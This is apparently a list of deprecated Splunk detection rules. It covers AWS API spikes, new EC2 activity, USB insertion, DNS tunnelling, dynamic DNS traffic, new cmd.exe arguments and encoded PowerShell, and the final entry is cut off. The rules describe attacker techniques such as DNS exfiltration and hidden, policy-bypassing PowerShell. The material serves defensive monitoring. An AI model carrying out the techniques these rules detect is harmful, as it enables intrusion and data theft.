`cloudtrail` eventType=AwsApiCall [search `cloudtrail` eventType=AwsApiCall | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup api_call_by_user_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup api_call_by_user_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventName, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_aws_api_activity_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike.\ This search produces fields (`eventName`,`numberOfApiCalls`,`uniqueApisCalled`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** AWS Event Name, **Field:** eventName\ 1. \ 1. **Label:** Number of API Calls, **Field:** numberOfApiCalls\ 1. \ 1. **Label:** Unique API Calls, **Field:** uniqueApisCalled\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Reference

Test Dataset

version: 2


Detect spike in network acl activity

This search will detect users creating spikes in API activity related to network access-control lists (ACLs)in your AWS environment. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1562.007
  • Last Updated: 2018-05-21

Search

`cloudtrail` `network_acl_events` [search `cloudtrail` `network_acl_events` | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup network_acl_activity_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup network_acl_activity_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventNames, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_network_acl_activity_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Network ACL Activity by ARN" support search once to create a lookup file of previously seen Network ACL Activity. To add or remove API event names related to network ACLs, edit the macro `network_acl_events`.

Required field

ATT&CK

ID Technique Tactic
T1562.007 Disable or Modify Cloud Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The false-positive rate may vary based on the values of`dataPointThreshold` and `deviationThreshold`. Please modify this according the your environment.

Reference

Test Dataset

version: 1


Detect spike in security group activity

This search will detect users creating spikes in API activity related to security groups in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2018-04-18

Search

`cloudtrail` `security_group_api_calls` [search `cloudtrail` `security_group_api_calls` | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup security_group_activity_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup security_group_activity_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventNames, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_security_group_activity_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike.This search works best when you run the "Baseline of Security Group Activity by ARN" support search once to create a history of previously seen Security Group Activity. To add or remove API event names for security groups, edit the macro `security_group_api_calls`.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Based on the values of`dataPointThreshold` and `deviationThreshold`, the false positive rate may vary. Please modify this according the your environment.

Reference

Test Dataset

version: 1


Detect usb device insertion

The search is used to detect hosts that generate Windows Event ID 4663 for successful attempts to write to or read from a removable storage and Event ID 4656 for failures, which occurs when a USB drive is plugged in. In this scenario we are querying the Change_Analysis data model to look for Windows Event ID 4656 or 4663 where the priority of the affected host is marked as high in the ES Assets and Identity Framework.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change_Analysis
  • ATT&CK:
  • Last Updated: 2017-11-27

Search

| tstats `security_content_summariesonly` count earliest(_time) AS earliest latest(_time) AS latest from datamodel=Change_Analysis where (nodename = All_Changes) All_Changes.result="Removable Storage device" (All_Changes.result_id=4663 OR All_Changes.result_id=4656) (All_Changes.src_priority=high) by All_Changes.dest | `drop_dm_object_name("All_Changes")` | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | `detect_usb_device_insertion_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663 and 4656. Ensure that the field from the event logs is being mapped to the result_id field in the Change_Analysis data model. To minimize the alert volume, this search leverages the Assets and Identity framework to filter out events from those assets not marked high priority in the Enterprise Security Assets and Identity Framework.

Required field

Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

Legitimate USB activity will also be detected. Please verify and investigate as appropriate.

Reference

Test Dataset

version: 1


Detect new api calls from user roles

This search detects new API calls that have either never been seen before or that have not been seen in the previous hour, where the identity type is `AssumedRole`.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2018-04-16

Search

`cloudtrail` eventType=AwsApiCall errorCode=success userIdentity.type=AssumedRole [search `cloudtrail` eventType=AwsApiCall errorCode=success userIdentity.type=AssumedRole | stats earliest(_time) as earliest latest(_time) as latest by userName eventName | inputlookup append=t previously_seen_api_calls_from_user_roles | stats min(earliest) as earliest, max(latest) as latest by userName eventName | outputlookup previously_seen_api_calls_from_user_roles | eval newApiCallfromUserRole=if(earliest>=relative_time(now(), "-70m@m"), 1, 0) | where newApiCallfromUserRole=1 | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | table eventName userName] |rename userName as user | stats values(eventName) earliest(_time) as earliest latest(_time) as latest by user | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | `detect_new_api_calls_from_user_roles_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously seen API call per user roles in CloudTrail" support search once to create a history of previously seen user roles.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It is possible that there are legitimate user roles making new or infrequently used API calls in your infrastructure, causing the search to trigger.

Reference

Test Dataset

version: 1


Detect new user aws console login

This search looks for CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour. Deprecated now this search is updated to use the Authentication datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=ConsoleLogin | rename userIdentity.arn as user | stats earliest(_time) as firstTime latest(_time) as lastTime by user | inputlookup append=t previously_seen_users_console_logins_cloudtrail | stats min(firstTime) as firstTime max(lastTime) as lastTime by user | eval userStatus=if(firstTime >= relative_time(now(), "-70m@m"), "First Time Logging into AWS Console","Previously Seen User") | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | where userStatus ="First Time Logging into AWS Console" | `detect_new_user_aws_console_login_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. Run the "Previously seen users in CloudTrail" support search only once to create a baseline of previously seen IAM users within the last 30 days. Run "Update previously seen users in CloudTrail" hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate.

Reference

Test Dataset

version: 2


Detect web traffic to dynamic domain providers

This search looks for web connections to dynamic DNS providers.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Web
  • ATT&CK: T1071.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Web.url) as url min(_time) as firstTime from datamodel=Web where Web.status=200 by Web.src Web.dest Web.status | `drop_dm_object_name("Web")` | `security_content_ctime(firstTime)` | `dynamic_dns_web_traffic` | `detect_web_traffic_to_dynamic_domain_providers_filter`

Associated Analytic Story


How To Implement

This search requires you to be ingesting web-traffic logs. You can obtain these logs from indexing data from a web proxy or by using a network-traffic-analysis tool, such as Bro or Splunk Stream. The web data model must contain the URL being requested, the IP address of the host initiating the request, and the destination IP. This search also leverages a lookup file, `dynamic_dns_providers_default.csv`, which contains a non-exhaustive list of dynamic DNS providers. Consider periodically updating this local lookup file with new domains.\ This search produces fields (`isDynDNS`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** IsDynamicDNS, **Field:** isDynDNS\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` Deprecated because duplicate.

Required field

ATT&CK

ID Technique Tactic
T1071.001 Web Protocols Command and Control


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

It is possible that list of dynamic DNS providers is outdated and/or that the URL being requested is legitimate.

Reference

Test Dataset

version: 2


Detection of dns tunnels

This search is used to detect DNS tunneling, by calculating the sum of the length of DNS queries and DNS answers. The search also filters out potential false positives by filtering out queries made to internal systems and the queries originating from internal DNS, Web, and Email servers. Endpoints using DNS as a method of transmission for data exfiltration, command and control, or evasion of security controls can often be detected by noting an unusually large volume of DNS traffic. Deprecated because existing detection is doing the same.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1048.003
  • Last Updated: 2017-09-18

Search

| tstats `security_content_summariesonly` dc("DNS.query") as count from datamodel=Network_Resolution where nodename=DNS "DNS.message_type"="QUERY" NOT (`cim_corporate_web_domain_search("DNS.query")`) NOT "DNS.query"="*.in-addr.arpa" NOT ("DNS.src_category"="svc_infra_dns" OR "DNS.src_category"="svc_infra_webproxy" OR "DNS.src_category"="svc_infra_email*" ) by "DNS.src","DNS.query" | rename "DNS.src" as src "DNS.query" as message | eval length=len(message) | stats sum(length) as length by src | append [ tstats `security_content_summariesonly` dc("DNS.answer") as count from datamodel=Network_Resolution where nodename=DNS "DNS.message_type"="QUERY" NOT (`cim_corporate_web_domain_search("DNS.query")`) NOT "DNS.query"="*.in-addr.arpa" NOT ("DNS.src_category"="svc_infra_dns" OR "DNS.src_category"="svc_infra_webproxy" OR "DNS.src_category"="svc_infra_email*" ) by "DNS.src","DNS.answer" | rename "DNS.src" as src "DNS.answer" as message | eval message=if(message=="unknown","", message) | eval length=len(message) | stats sum(length) as length by src ] | stats sum(length) as length by src | where length > 10000 | `detection_of_dns_tunnels_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, we must ensure that DNS data is being ingested and mapped to the appropriate fields in the Network_Resolution data model. Fields like src_category are automatically provided by the Assets and Identity Framework shipped with Splunk Enterprise Security. You will need to ensure you are using the Assets and Identity Framework and populating the src_category field. You will also need to enable the `cim_corporate_web_domain_search()` macro which will essentially filter out the DNS queries made to the corporate web domains to reduce alert fatigue.

Required field

ATT&CK

ID Technique Tactic
T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Exfiltration


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

It's possible that normal DNS traffic will exhibit this behavior. If an alert is generated, please investigate and validate as appropriate. The threshold can also be modified to better suit your environment.

Reference

Test Dataset

version: 2


Ec2 instance modified with previously unseen user

This search looks for EC2 instances being modified by users who have not previously modified them. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` `ec2_modification_api_calls` [search `cloudtrail` `ec2_modification_api_calls` errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by userIdentity.arn | rename userIdentity.arn as arn | inputlookup append=t previously_seen_ec2_modifications_by_user | stats min(firstTime) as firstTime, max(lastTime) as lastTime by arn | outputlookup previously_seen_ec2_modifications_by_user | eval newUser=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newUser=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=dest responseElements.instancesSet.items{}.instanceId | spath output=user userIdentity.arn | table _time, user, dest | `ec2_instance_modified_with_previously_unseen_user_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Launches By User" support search once to create a history of previously seen ARNs. To add or remove APIs that modify an EC2 instance, edit the macro `ec2_modification_api_calls`.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a new user will start to modify EC2 instances when they haven't before for any number of reasons. Verify with the user that is modifying instances that this is the intended behavior.

Reference

Test Dataset

version: 3


Ec2 instance started in previously unseen region

This search looks for CloudTrail events where an instance is started in a particular region in the last one hour and then compares it to a lookup file of previously seen regions where an instance was started

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1535
  • Last Updated: 2018-02-23

Search

`cloudtrail` earliest=-1h StartInstances | stats earliest(_time) as earliest latest(_time) as latest by awsRegion | inputlookup append=t previously_seen_aws_regions.csv | stats min(earliest) as earliest max(latest) as latest by awsRegion | outputlookup previously_seen_aws_regions.csv | eval regionStatus=if(earliest >= relative_time(now(),"-1d@d"), "Instance Started in a New Region","Previously Seen Region") | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | where regionStatus="Instance Started in a New Region" | `ec2_instance_started_in_previously_unseen_region_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. Run the "Previously seen AWS Regions" support search only once to create of baseline of previously seen regions. This search is deprecated and have been translated to use the latest Change Datamodel.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a user has unknowingly started an instance in a new region. Please verify that this activity is legitimate.

Reference

Test Dataset

version: 1


Ec2 instance started with previously unseen ami

This search looks for EC2 instances being created with previously unseen AMIs. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-03-12

Search

`cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by requestParameters.instancesSet.items{}.imageId | rename requestParameters.instancesSet.items{}.imageId as amiID | inputlookup append=t previously_seen_ec2_amis.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by amiID | outputlookup previously_seen_ec2_amis.csv | eval newAMI=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | where newAMI=1 | rename amiID as requestParameters.instancesSet.items{}.imageId | table requestParameters.instancesSet.items{}.imageId] | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest, userIdentity.arn as arn, requestParameters.instancesSet.items{}.imageId as amiID | table firstTime, lastTime, arn, amiID, dest, instanceType | `ec2_instance_started_with_previously_unseen_ami_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen EC2 AMIs" support search once to create a history of previously seen AMIs.

Required field

Kill Chain Phase

Known False Positives

After a new AMI is created, the first systems created with that AMI will cause this alert to fire. Verify that the AMI being used was created by a legitimate user.

Reference

Test Dataset

version: 1


Ec2 instance started with previously unseen instance type

This search looks for EC2 instances being created with previously unseen instance types. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-02-07

Search

`cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | fillnull value="m1.small" requestParameters.instanceType | stats earliest(_time) as earliest latest(_time) as latest by requestParameters.instanceType | rename requestParameters.instanceType as instanceType | inputlookup append=t previously_seen_ec2_instance_types.csv | stats min(earliest) as earliest max(latest) as latest by instanceType | outputlookup previously_seen_ec2_instance_types.csv | eval newType=if(earliest >= relative_time(now(), "-70m@m"), 1, 0) | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | where newType=1 | rename instanceType as requestParameters.instanceType | table requestParameters.instanceType] | spath output=user userIdentity.arn | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest | table _time, user, dest, instanceType | `ec2_instance_started_with_previously_unseen_instance_type_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Instance Types" support search once to create a history of previously seen instance types.

Required field

Kill Chain Phase

Known False Positives

It is possible that an admin will create a new system using a new instance type never used before. Verify with the creator that they intended to create the system with the new instance type.

Reference

Test Dataset

version: 2


Ec2 instance started with previously unseen user

This search looks for EC2 instances being created by users who have not created them before. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=RunInstances [search `cloudtrail` eventName=RunInstances errorCode=success | stats earliest(_time) as firstTime latest(_time) as lastTime by userIdentity.arn | rename userIdentity.arn as arn | inputlookup append=t previously_seen_ec2_launches_by_user.csv | stats min(firstTime) as firstTime, max(lastTime) as lastTime by arn | outputlookup previously_seen_ec2_launches_by_user.csv | eval newUser=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newUser=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename arn as userIdentity.arn | table userIdentity.arn] | rename requestParameters.instanceType as instanceType, responseElements.instancesSet.items{}.instanceId as dest, userIdentity.arn as user | table _time, user, dest, instanceType | `ec2_instance_started_with_previously_unseen_user_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen EC2 Launches By User" support search once to create a history of previously seen ARNs.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a user will start to create EC2 instances when they haven't before for any number of reasons. Verify with the user that is launching instances that this is the intended behavior.

Reference

Test Dataset

version: 2


Execution of file with spaces before extension

This search looks for processes launched from files with at least five spaces in the name before the extension. This is typically done to obfuscate the file extension by pushing it outside of the default view.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1036.003
  • Last Updated: 2020-11-19

Search

| tstats `security_content_summariesonly` count values(Processes.process_path) as process_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "* .*" by Processes.dest Processes.user Processes.process Processes.process_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `execution_of_file_with_spaces_before_extension_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1036.003 Rename System Utilities Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 3


Extended period without successful netbackup backups

This search returns a list of hosts that have not successfully completed a backup in over a week. Deprecated because it's a infrastructure monitoring.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2017-09-12

Search

`netbackup` MESSAGE="Disk/Partition backup completed successfully." | stats latest(_time) as latestTime by COMPUTERNAME | `security_content_ctime(latestTime)` | rename COMPUTERNAME as dest | eval isOutlier=if(latestTime <= relative_time(now(), "-7d@d"), 1, 0) | search isOutlier=1 | table latestTime, dest | `extended_period_without_successful_netbackup_backups_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to first obtain data from your backup solution, either from the backup logs on your hosts, or from a central server responsible for performing the backups. If you do not use Netbackup, you can modify this search for your backup solution. Depending on how often you backup your systems, you may want to modify how far in the past to look for a successful backup, other than the default of seven days.

Required field

Kill Chain Phase

Known False Positives

None identified

Reference

Test Dataset

version: 1


First time seen command line argument

This search looks for command-line arguments that use a `/c` parameter to execute a command that has not previously been seen.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001, T1059.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe Processes.process = "* /c *" by Processes.process Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search [ | tstats `security_content_summariesonly` earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe Processes.process = "* /c *" by Processes.process | `drop_dm_object_name(Processes)` | inputlookup append=t previously_seen_cmd_line_arguments | stats min(firstTime) as firstTime, max(lastTime) as lastTime by process | outputlookup previously_seen_cmd_line_arguments | eval newCmdLineArgument=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCmdLineArgument=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table process] | `first_time_seen_command_line_argument_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must be ingesting logs with both the process name and command line from your endpoints. The complete process name with command-line arguments are mapped to the "process" field in the Endpoint data model. Please make sure you run the support search "Previously seen command line arguments,"&#151;which creates a lookup file called `previously_seen_cmd_line_arguments.csv`&#151;a historical baseline of all command-line arguments. You must also validate this list. For the search to do accurate calculation, ensure the search scheduling is the same value as the `relative_time` evaluation function.

Required field

ATT&CK

ID Technique Tactic
T1059.001 PowerShell Execution
T1059.003 Windows Command Shell Execution


Kill Chain Phase

  • Command and Control
  • Actions on Objectives


Known False Positives

Legitimate programs can also use command-line arguments to execute. Please verify the command-line arguments to check what command/program is being executed. We recommend customizing the `first_time_seen_cmd_line_filter` macro to exclude legitimate parent_process_name

Reference

Test Dataset

version: 5


Gcp gcr container uploaded

This search show information on uploaded containers including source user, account, action, bucket name event name, http user agent, message and destination path.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1525
  • Last Updated: 2020-02-20

Search

|tstats count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Cloud_Infrastructure.Storage where Storage.event_name=storage.objects.create by Storage.src_user Storage.account Storage.action Storage.bucket_name Storage.event_name Storage.http_user_agent Storage.msg Storage.object_path | `drop_dm_object_name("Storage")` | `gcp_gcr_container_uploaded_filter`

Associated Analytic Story


How To Implement

You must install the GCP App for Splunk (version 2.0.0 or later), then configure stackdriver and set a subpub subscription to be imported to Splunk. You must also install Cloud Infrastructure data model. Please also customize the `container_implant_gcp_detection_filter` macro to filter out the false positives.

Required field

ATT&CK

ID Technique Tactic
T1525 Implant Container Image Persistence


Kill Chain Phase

Known False Positives

Uploading container is a normal behavior from developers or users with access to container registry. GCP GCR registers container upload as a Storage event, this search must be considered under the context of CONTAINER upload creation which automatically generates a bucket entry for destination path.

Reference

Test Dataset

version: 1


Identify new user accounts

This detection search will help profile user accounts in your environment by identifying newly created accounts that have been added to your network in the past week.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.002
  • Last Updated: 2017-09-12

Search

| from datamodel Identity_Management.All_Identities | eval empStatus=case((now()-startDate)<604800, "Accounts created in last week") | search empStatus="Accounts created in last week" | `security_content_ctime(endDate)` | `security_content_ctime(startDate)` | table identity empStatus endDate startDate | `identify_new_user_accounts_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be populating the Enterprise Security Identity_Management data model in the assets and identity framework.

Required field

ATT&CK

ID Technique Tactic
T1078.002 Domain Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

If the Identity_Management data model is not updated regularly, this search could give you false positive alerts. Please consider this and investigate appropriately.

Reference

Test Dataset

version: 1


Malicious powershell process - multiple suspicious command-line arguments

This search looks for PowerShell processes started with a base64 encoded command-line passed to it, with parameters to modify the execution policy for the process, and those that prevent the display of an interactive prompt to the user. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide itself from the user, and passes an encoded script to be run on the command-line. Deprecated because almost the same as Malicious PowerShell Process - Encoded Command

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.001
  • Last Updated: 2021-01-19

Search

